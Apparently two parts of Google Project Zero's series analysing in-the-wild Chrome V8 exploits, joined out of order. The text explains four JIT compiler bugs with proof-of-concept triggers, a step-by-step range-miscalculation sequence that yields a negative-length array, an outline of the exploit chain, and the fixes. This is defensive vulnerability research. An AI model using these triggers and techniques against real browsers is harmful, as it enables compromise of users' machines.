The first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the “shape” of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can’t point to the same object, it doesn’t invalidate the recorded map state of global_array and, consequently, eliminates the “redundant” map check in the last line of the function.

The vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.

The issue was reported to Chrome by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. The fix made made the alias analyser use the constant comparison only when both arguments are constants:

 HAliasing Query(HValue* a, HValue* b) {

  [...]

     // Constant objects can be distinguished statically.

-    if (a->IsConstant()) {

+    if (a->IsConstant() && b->IsConstant()) {

       return a->Equals(b) ? kMustAlias : kNoAlias;

     }

     return kMayAlias;

Exploit 1

The earliest exploit we’ve discovered targets Chrome 37-58. This is the widest version range we’ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.

The author of the exploit takes a known approach to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It “constructs” a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can’t be modified. Instead, it’s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.

The exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.

The author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren’t moved by the garbage collector. And, of course, the exploit runs inside a web worker.

However, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it’s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.

Exploit 2

The second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit’s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.

The general approach is similar, however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind as it’s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is using a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor.

While it’s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue, for example, their trigger function is much more straightforward than in the public proof-of-concept.

2. CVE-2020-6418

The vulnerability

This is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:

'use strict';

(function() {

  var popped;

 

  function trigger(new_target) {

    function inner(new_target) {

      function constructor() {

        popped = Array.prototype.pop.call(array);

      }

      var temp = array[0];

      return Reflect.construct(constructor, arguments, new_target);

    }

 

    inner(new_target);

  }

 

  var array = new Array(0, 0, 0, 0, 0);

 

  for (var i = 0; i < 20000; i++) {

    trigger(function() { });

    array.push(0);

  }

 

  var proxy = new Proxy(Object, {

    get: () => (array[4] = 1.1, Object.prototype)

  });

 

  trigger(proxy);

  print(popped);

}());

A call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable meaning that it doesn’t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.

Note that the attacker can’t call the array function directly because for the expression array.pop() the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.

This is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was reported to Chrome under the 7-day deadline. The one-line patch modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:

InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(

[...]

  InferReceiverMapsResult result = kReliableReceiverMaps;

[...]

    case IrOpcode::kJSCreate: {

      if (IsSame(receiver, effect)) {

        base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);

        if (initial_map.has_value()) {

          *maps_return = ZoneHandleSet<Map>(initial_map->object());

          return result;

        }

        // We reached the allocation of the {receiver}.

        return kNoReceiverMaps;

      }

+     result = kUnreliableReceiverMaps;  // JSCreate can have side-effect.

      break;

    }

[...]

The reader can refer to the blog post published by Exodus Intel for more details on the issue and their version of the exploit.

Exploit 1

This time there’s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.

The exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the “popped” value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.

The exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can “survive'' garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private symbols, owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the “trustworthy” indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.

The obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.

Finally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.

The author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn’t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.

The exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:

jit_detector[Symbol.toPrimitive] = function() {

  var stack = (new Error).stack;

  if (stack.indexOf("Number (") == -1) {

    jit_detector.is_compiled = true;

  }

};

function trigger(array, proxy) {

  if (!jit_detector.is_compiled) {

    Number(jit_detector);

  }

[...]

During compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.

The exploit was broken in Chrome 64 by the change that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.

Exploit 2

After CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, another commit landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. Therefore, the trigger function had to be updated:

function trigger(new_target) {

  function inner(new_target) {

    popped = array.pop(

        Reflect.construct(function() { }, arguments, new_target));

  }

 

  inner(new_target);

}

By making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.

The new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn’t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.

The exploit can’t modify the class body indices directly as they’re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.

This version targets Chrome 68-72. It was broken by the commit that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.

Exploit 3 & 4

The actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That’s the only significant change made by the author.

Exploit 3 is the only one we’ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant amount of number and string literals got updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.

The exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.

The public exploit presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn’t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the pointer compression feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.

3. CVE-2019-5782

The vulnerability

CVE-2019-5782 is an issue in TurboFan’s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.

Note that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the previous post.

In this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:

oob_index = 100000;

 

function trigger() {

  let array = [1.1, 1.1];

 

  let index = arguments.length;

  index = index - 65534;

  index = Math.max(index, 0);

   

  return array[index] = 2.2;

}

 

for (let i = 0; i < 20000; i++) {

  trigger(1,2,3);

}

 

print(trigger.apply(null, new Array(65534 + oob_index)));

Qixun Zhao used the same vulnerability in Tianfu Cup and reported it to Chrome in November 2018. The public report includes a renderer exploit. The fix, which landed in Chrome 72, simply relaxed the range of the length property.

The exploit

The discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn’t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It’s worth noting that this approach doesn’t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.

Interestingly, this is the only exploit that doesn’t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.

As the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that one of the hardening patches against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with site isolation; hence, the public exploit, which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.

The public and private exploits have little in common apart from the bug itself and BCE technique, which has been commonly known since at least 2017. The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.

4. CVE-2019-13764

This more complex typer issue occurs when TurboFan doesn’t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:

for (var i = -Infinity; i < 0; i += Infinity) { [...] }

This vulnerability and exploit for Chrome 73-79 have been discussed in detail in the previous blog post. There’s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.

The comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn’t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.

It’s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have “revived” the exploit for CVE-2019-5782.

Conclusion

The timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.

It is no secret that exploit reliability is a priority for high-tier attackers, but our findings  demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor has switched from an already high-quality 0-day to a slightly better vulnerability twice.

The area of JIT engine security has received great attention from the wider security community over the last few years. In 2015, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don’t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 4: Android Exploits.

In-the-Wild Series: Chrome Infinity Bug

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero

This post only covers one of the exploits, specifically a renderer exploit targeting Chrome 73-78 on Android. We use it as an opportunity to talk about an interesting vulnerability class in Chrome’s JavaScript engine.

Brief introduction to typer bugs

One of the features that make JavaScript code especially difficult to optimize is the dynamic type system. Even for a trivial expression like a + b the engine has to support a multitude of cases depending on whether the parameters are numbers, strings, booleans, objects, etc. JIT compilation wouldn’t make much sense if the compiler always had to emit machine code that could handle every possible type combination for every JS operation. Chrome’s JavaScript engine, V8, tries to overcome this limitation through type speculation. During the first several invocations of a JavaScript function, the interpreter records the type information for various operations such as parameter accesses and property loads. If the function is later selected to be JIT compiled, TurboFan, which is V8’s newest compiler, makes an assumption that the observed types will be used in all subsequent calls, and propagates the type information throughout the whole function graph using the set of rules derived from the language specification. For example: if at least one of the operands to the addition operator is a string, the output is guaranteed to be a string as well; Math.random() always returns a number; and so on. The compiler also puts runtime checks for the speculated types that trigger deoptimization (i.e., revert to execution in the interpreter and update the type feedback) in case one of the assumptions no longer holds.

For integers, V8 goes even further and tracks the possible range of nodes. The main reason behind that is that even though the ECMAScript specification defines Number as the 64-bit floating point type, internally, TurboFan always tries to use the most efficient representation possible in a given context, which could be a 64-bit integer, 31-bit tagged integer, etc. Range information is also employed in other optimizations. For example, the compiler is smart enough to figure out that in the following code snippet, the branch can never be taken and therefore eliminate the whole if statement:

a = Math.min(a, 1);

if (a > 2) {

  return 3;

}

Now, imagine there’s an issue that makes TurboFan believe that the function vuln() returns a value in the range [0; 2] whereas its actual range is [0; 4]. Consider the code below:

a = vuln(a);

let array = [1, 2, 3];

return array[a];

If the engine has never encountered an out-of-bounds access attempt while running the code in the interpreter, it will instruct the compiler to transform the last line into a sequence that at a certain optimization phase, can be expressed by the following pseudocode:

if (a >= array.length) {

  deoptimize();

}

let elements = array.[[elements]];

return elements.get(a);

get() acts as a C-style element access operation and performs no bounds checks. In subsequent optimization phases the compiler will discover that, according to the available type information, the length check is redundant and eliminate it completely. Consequently, the generated code will be able to access out-of-bounds data.

The bug class outlined above is the main subject of this blog post; and bounds check elimination is the most popular exploitation technique for this class. A textbook example of such a vulnerability is the off-by-one issue in the typer rule for String.indexOf found by Stephen Röttger.

A typer vulnerability doesn’t have to immediately result in an integer range miscalculation that would lead to OOB access because it’s possible to make the compiler propagate the error. For example, if vuln() returns an unexpected boolean value, we can easily transform it into an unexpected integer:

a = vuln(a); // predicted = false; actual = true

a = a * 10;  // predicted = 0; actual = 10

let array = [1, 2, 3];

return array[a];

Another notable bug report by Stephen demonstrates that even a subtle mistake such as omitting negative zero can be exploited in the same fashion.

At a certain point, this vulnerability class became extremely popular as it immediately provided an attacker with an enormously powerful and reliable exploitation primitive. Fellow Project Zero member Mark Brand has used it in his full-chain Chrome exploit. The bug class has made an appearance at several CTFs and exploit competitions. As a result, last year the V8 team issued a hardening patch designed to prevent attackers from abusing bounds check elimination. Instead of removing the checks, the compiler started marking them as “aborting”, so in the worst case the attacker can only trigger a SIGTRAP.

Induction variable analysis

The renderer exploit we’ve discovered takes advantage of an issue in a function designed to compute the type of induction variables. The slightly abridged source code below is taken from the latest affected revision of V8:

Type Typer::Visitor::TypeInductionVariablePhi(Node* node) {

  [...]

  // We only handle integer induction variables (otherwise ranges

  // do not apply and we cannot do anything).

  if (!initial_type.Is(typer_->cache_->kInteger) ||

      !increment_type.Is(typer_->cache_->kInteger)) {

    // Fallback to normal phi typing, but ensure monotonicity.

    // (Unfortunately, without baking in the previous type,

    // monotonicity might be violated because we might not yet have

    // retyped the incrementing operation even though the increment's

    // type might been already reflected in the induction variable

    // phi.)

    Type type = NodeProperties::IsTyped(node)

                    ? NodeProperties::GetType(node)

                    : Type::None();

    for (int i = 0; i < arity; ++i) {

      type = Type::Union(type, Operand(node, i), zone());

    }

    return type;

  }

  // If we do not have enough type information for the initial value

  // or the increment, just return the initial value's type.

  if (initial_type.IsNone() ||

      increment_type.Is(typer_->cache_->kSingletonZero)) {

    return initial_type;

  }

  [...]

  InductionVariable::ArithmeticType arithmetic_type =

      induction_var->Type();

  double min = -V8_INFINITY;

  double max = V8_INFINITY;

  double increment_min;

  double increment_max;

  if (arithmetic_type ==

      InductionVariable::ArithmeticType::kAddition) {

    increment_min = increment_type.Min();

    increment_max = increment_type.Max();

  } else {

    DCHECK_EQ(InductionVariable::ArithmeticType::kSubtraction,

              arithmetic_type);

    increment_min = -increment_type.Max();

    increment_max = -increment_type.Min();

  }

  if (increment_min >= 0) {

    // increasing sequence

    min = initial_type.Min();

    for (auto bound : induction_var->upper_bounds()) {

      Type bound_type = TypeOrNone(bound.bound);

      // If the type is not an integer, just skip the bound.

      if (!bound_type.Is(typer_->cache_->kInteger)) continue;

      // If the type is not inhabited, then we can take the initial

      // value.

      if (bound_type.IsNone()) {

        max = initial_type.Max();

        break;

      }

      double bound_max = bound_type.Max();

      if (bound.kind == InductionVariable::kStrict) {

        bound_max -= 1;

      }

      max = std::min(max, bound_max + increment_max);

    }

    // The upper bound must be at least the initial value's upper

    // bound.

    max = std::max(max, initial_type.Max());

  } else if (increment_max <= 0) {

    // decreasing sequence

    [...]

  } else {

    // Shortcut: If the increment can be both positive and negative,

    // the variable can go arbitrarily far, so just return integer.

    return typer_->cache_->kInteger;

  }

  [...]

  return Type::Range(min, max, typer_->zone());

}

Now, imagine the compiler processing the following JavaScript code:

for (var i = initial; i < bound; i += increment) { [...] }

In short, when the loop has been identified as increasing, the lower bound of initial becomes the lower bound of i, and the upper bound is calculated as the sum of the upper bounds of bound and increment. There’s a similar branch for decreasing loops, and a special case for variables that can be both increasing and decreasing. The loop variable is named phi in the method because TurboFan operates on an intermediate representation in the static single assignment form.

Note that the algorithm only works with integers, otherwise a more conservative estimation method is applied. However, in this context an integer refers to a rather special type, which isn’t bound to any machine integer type and can be represented as a floating point value in memory. The type holds two unusual properties that have made the vulnerability possible:

  • +Infinity and -Infinity belong to it, whereas NaN and -0 don’t.
  • The type is not closed under addition, i.e., adding two integers doesn’t always result in an integer. Namely, +Infinity + -Infinity yields NaN.

Thus, for the following loop the algorithm infers (-Infinity; +Infinity) as the induction variable type, while the actual value after the first iteration of the loop will be NaN:

for (var i = -Infinity; i < 0; i += Infinity) { }

This one line is enough to trigger the issue. The exploit author has had to make only two minor changes: (1) parametrize increment in order to make the value of i match the future inferred type during initial invocations in the interpreter and (2) introduce an extra variable to ensure the loop eventually ends. As a result, after deobfuscation, the relevant part of the trigger function looks as follows:

function trigger(argument) {

  var j = 0;

  var increment = 100;

  if (argument > 2) {

    increment = Infinity;

  }

  for (var i = -Infinity; i <= -Infinity; i += increment) {

    j++;

    if (j == 20) {

      break;

    }

  }

[...]

The resulting type mismatch, however, doesn’t immediately let the attacker run arbitrary code. Given that the previously widely used bounds check elimination technique is no longer applicable, we were particularly interested to learn how the attacker approached exploiting the issue.

Exploitation

The trigger function continues with a series of operations aimed at transforming the type mismatch into an integer range miscalculation, similarly to what would follow in the previous technique, but with the additional requirement that the computed range must be narrowed down to a single number. Since the discovered exploit targets mobile devices, the exact instruction sequence used in the exploit only works for ARM processors. For the ease of the reader, we've modified it to be compatible with x64 as well.

[...]

  // The comments display the current value of the variable i, the type

  // inferred by the compiler, and the machine type used to store

  // the value at each step.

  // Initially:

  // actual = NaN, inferred = (-Infinity, +Infinity)

  // representation = double

  i = Math.max(i, 0x100000800);

  // After step one:

  // actual = NaN, inferred = [0x100000800; +Infinity)

  // representation = double

  i = Math.min(0x100000801, i);

  // After step two:

  // actual = -0x8000000000000000, inferred = [0x100000800, 0x100000801]

  // representation = int64_t

  i -= 0x1000007fa;

  // After step three:

  // actual = -2042, inferred = [6, 7]

  // representation = int32_t

  i >>= 1;

  // After step four:

  // actual = -1021, inferred = 3

  // representation = int32_t

  i += 10;

  // After step five:

  // actual = -1011, inferred = 13

  // representation = int32_t

[...]

The first notable transformation occurs in step two. TurboFan decides that the most appropriate representation for i at this point is a 64-bit integer as the inferred range is entirely within int64_t, and emits the CVTTSD2SI instruction to convert the double argument. Since NaN doesn’t fit in the integer range, the instruction returns the “indefinite integer value” -0x8000000000000000. In the next step, the compiler determines it can use the even narrower int32_t type. It discards the higher 32-bit word of i, assuming that for the values in the given range it has the same effect as subtracting 0x100000000, and then further subtracts 0x7fa. The remaining two operations are straightforward; however, one might wonder why the attacker couldn’t make the compiler derive the required single-value type directly in step two. The answer lies in the optimization pass called the constant-folding reducer.

Reduction ConstantFoldingReducer::Reduce(Node* node) {

  DisallowHeapAccess no_heap_access;

  if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&

      node->op()->HasProperty(Operator::kEliminatable) &&

      node->opcode() != IrOpcode::kFinishRegion) {

    Node* constant = TryGetConstant(jsgraph(), node);

    if (constant != nullptr) {

      ReplaceWithValue(node, constant);

      return Replace(constant);

[...]

If the reducer discovered that the output type of the NumberMin operator was a constant, it would replace the node with a reference to the constant thus eliminating the type mismatch. That doesn’t apply to the SpeculativeNumberShiftRight and SpeculativeSafeIntegerAdd nodes, which represent the operations in steps four and five while the reducer is running, because they both are capable of triggering deoptimization and therefore not marked as eliminable.

Formerly, the next step would be to abuse this mismatch to optimize away an array bounds check. Instead, the attacker makes use of the incorrectly typed value to create a JavaScript array for which bounds checks always pass even outside the compiled function. Consider the following method, which attempts to optimize array constructor calls:

Reduction JSCreateLowering::ReduceJSCreateArray(Node* node) {

[...]

} else if (arity == 1) {

  Node* length = NodeProperties::GetValueInput(node, 2);

  Type length_type = NodeProperties::GetType(length);

  if (!length_type.Maybe(Type::Number())) {

    // Handle the single argument case, where we know that the value

    // cannot be a valid Array length.

    elements_kind = GetMoreGeneralElementsKind(

        elements_kind, IsHoleyElementsKind(elements_kind)

                           ? HOLEY_ELEMENTS

                           : PACKED_ELEMENTS);

    return ReduceNewArray(node, std::vector<Node*>{length}, *initial_map,

                          elements_kind, allocation,

                          slack_tracking_prediction);

  }

  if (length_type.Is(Type::SignedSmall()) && length_type.Min() >= 0 &&

      length_type.Max() <= kElementLoopUnrollLimit &&

      length_type.Min() == length_type.Max()) {

    int capacity = static_cast<int>(length_type.Max());

    return ReduceNewArray(node, length, capacity, *initial_map,

                          elements_kind, allocation,

                          slack_tracking_prediction);

[...]

When the argument is known to be an integer constant less than 16, the compiler inlines the array creation procedure and unrolls the element initialization loop. ReduceJSCreateArray doesn’t rely on the constant-folding reducer and implements its own less strict equivalent that just compares the upper and lower bounds of the inferred type. Unfortunately, even after folding the function keeps using the original argument node. The folded value is employed during initialization of the backing store while the length property of the array is set to the original node. This means that if we pass the value we obtained at step five to the constructor, it will return an array with the negative length and backing store that can fit 13 elements. Given that bounds checks are implemented as unsigned comparisons, the сrafted array will allow us to access data well past its end. In fact, any positive value bigger than its predicted version would work as well.

The rest of the trigger function is provided below:

[...]

  corrupted_array = Array(i);

  corrupted_array[0] = 1.1;

  ptr_leak_array = [wasm_module, array_buffer, [...],

                    wasm_module, array_buffer]; 

  extra_array = [13.37, [...], 13.37, 1.234]; 

  return [corrupted_array, ptr_leak_array, extra_array];

}

The attacker forces TurboFan to put the data required for further exploitation right next to the corrupted array and to use the double element type for the backing store as it’s the most convenient type for dealing with out-of-bounds data in the V8 heap.

From this point on, the exploit follows the same algorithm that public V8 exploits have been following for several years:

  1. Locate the required pointers and object fields through pattern-matching.
  2. Construct an arbitrary memory access primitive using an extra JavaScript array and ArrayBuffer.
  3. Follow the pointer chain from a WebAssembly module instance to locate a writable and executable memory page.
  4. Overwrite the body of a WebAssembly function inside the page with the attacker’s payload.
  5. Finally, execute it.

The contents of the payload, which is about half a megabyte in size, will be discussed in detail in a subsequent blog post.

Given that the vast majority of Chrome exploits we have seen at Project Zero come from either exploit competitions or VRP submissions, the most striking difference this exploit has demonstrated lies in its focus on stability and reliability. Here are some examples. Almost the entire exploit is executed inside a web worker, which means it has a separate JavaScript environment and runs in its own thread. This greatly reduces the chance of the garbage collector causing an accidental crash due to the inconsistent heap state. The main thread part is only responsible for restarting the worker in case of failure and passing status information to the attacker’s server. The exploit attempts to further reduce the time window for GC crashes by ensuring that every corrupted field is restored to the original value as soon as possible. It also employs the OOB access primitive early on to verify the processor architecture information provided in the user agent header. Finally, the author has clearly aimed to keep the number of hard-coded constants to a minimum. Despite supporting a wide range of Chrome versions, the exploit relies on a single version-dependent offset, namely, the offset in the WASM instance to the executable page pointer.

Patch 1

Even though there’s evidence this vulnerability has been originally used as a 0-day, by the time we obtained the exploit, it had already been fixed. The issue was reported to Chrome by security researchers Soyeon Park and Wen Xu in November 2019 and was assigned CVE-2019-13764. The proof of concept provided in the report is shown below:

function write(begin, end, step) {

  for (var i = begin; i >= end; i += step) {

    step = end - begin;

    begin >>>= 805306382;

  }

}

var buffer = new ArrayBuffer(16384);

var view = new Uint32Array(buffer);

for (let i = 0; i < 10000; i++) {

  write(Infinity, 1, view[65536], 1);

}

As the reader can see, it’s not the most straightforward way to trigger the issue. The code resembles fuzzer output, and the reporters confirmed that the bug had been found through fuzzing. Given the available evidence, we’re fully confident that it was an independent discovery (sometimes referred to as a "bug collision").

Since the proof of concept could only lead to a SIGTRAP crash, and the reporters hadn’t demonstrated, for example, a way to trigger memory corruption, it was initially considered a low-severity issue by the V8 engineers, however, after an internal discussion, the V8 team raised the severity rating to high.

In the light of the in-the-wild exploitation evidence, we decided to give the fix, which had introduced an explicit check for the NaN case, a thorough examination:

[...]

const bool both_types_integer =

    initial_type.Is(typer_->cache_->kInteger) &&

    increment_type.Is(typer_->cache_->kInteger);

bool maybe_nan = false;

// The addition or subtraction could still produce a NaN, if the integer

// ranges touch infinity.

if (both_types_integer) {

  Type resultant_type =

      (arithmetic_type == InductionVariable::ArithmeticType::kAddition)

          ? typer_->operation_typer()->NumberAdd(initial_type,

                                                 increment_type)

          : typer_->operation_typer()->NumberSubtract(initial_type,

                                                      increment_type);

  maybe_nan = resultant_type.Maybe(Type::NaN());

}

// We only handle integer induction variables (otherwise ranges

// do not apply and we cannot do anything).

if (!both_types_integer || maybe_nan) {

[...]

The code makes the assumption that the loop variable may only become NaN if the sum or difference of initial and increment is NaN. At first sight, it seems like a fair assumption. The issue arises from the fact that the value of increment can be changed from inside the loop, which isn’t obvious from the exploit but demonstrated in the proof of concept sent to Chrome. The typer takes into account these changes and reflects them in increment’s computed type. Therefore, the attacker can, for example, add negative increment to i until the latter becomes -Infinity, then change the sign of increment and force the loop to produce NaN once more, as demonstrated by the code below:

var increment = -Infinity;

var k = 0;

for (var i = 0; i < 1; i += increment) {

  if (i == -Infinity) {

    increment = +Infinity;

  }

  if (++k > 10) {

    break;

  }

}

Thus, to “revive” the entire exploit, the attacker only needs to change a couple of lines in trigger.

Patch 2

The discovered variant was reported to Chrome in February along with the exploitation technique found in the exploit. This time the patch took a more conservative approach and made the function bail out as soon as the typer detects that increment can be Infinity.

[...]

// If we do not have enough type information for the initial value or

// the increment, just return the initial value's type.

if (initial_type.IsNone() ||

    increment_type.Is(typer_->cache_->kSingletonZero)) {

  return initial_type;

}

// We only handle integer induction variables (otherwise ranges do not

// apply and we cannot do anything). Moreover, we don't support infinities

// in {increment_type} because the induction variable can become NaN

// through addition/subtraction of opposing infinities.

if (!initial_type.Is(typer_->cache_->kInteger) ||

    !increment_type.Is(typer_->cache_->kInteger) ||

    increment_type.Min() == -V8_INFINITY ||

    increment_type.Max() == +V8_INFINITY) {

[...]

Additionally, ReduceJSCreateArray was updated to always use the same value for both the  length property and backing store capacity, thus rendering the reported exploitation technique useless.

